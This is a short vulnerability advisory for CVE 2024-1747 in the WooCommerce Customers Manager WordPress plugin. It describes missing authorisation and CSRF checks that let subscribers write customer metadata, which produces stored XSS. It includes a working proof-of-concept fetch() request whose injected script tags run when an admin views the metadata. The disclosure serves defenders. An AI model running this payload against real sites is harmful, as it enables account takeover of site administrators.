WooCommerce Customers Manager < 30.2 – Subscriber+ Stored XSS | CVE 2024-1747

Description

The plugin does not have authorisation and CSRF in various AJAX actions, allowing any authenticated users, such as subscriber, to call them and update/delete/create customer metadata, also leading to Stored Cross-Site Scripting due to the lack of escaping of said metadata values.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber (change the user_id to a valid one)

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wccm_update_user_meta&user_id=5&key=XSS</textarea><script>alert(/XSS-meta-key/)</script>&value=</textarea><script>alert(/XSS-meta-value/)</script>&meta_id=',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));


The XSS will be triggered when an admin will view the metadata for the user with the given user_id: https://example.com/wp-admin/?page=woocommerce-customers-manager&action=wccm-customer-metadata&customer=5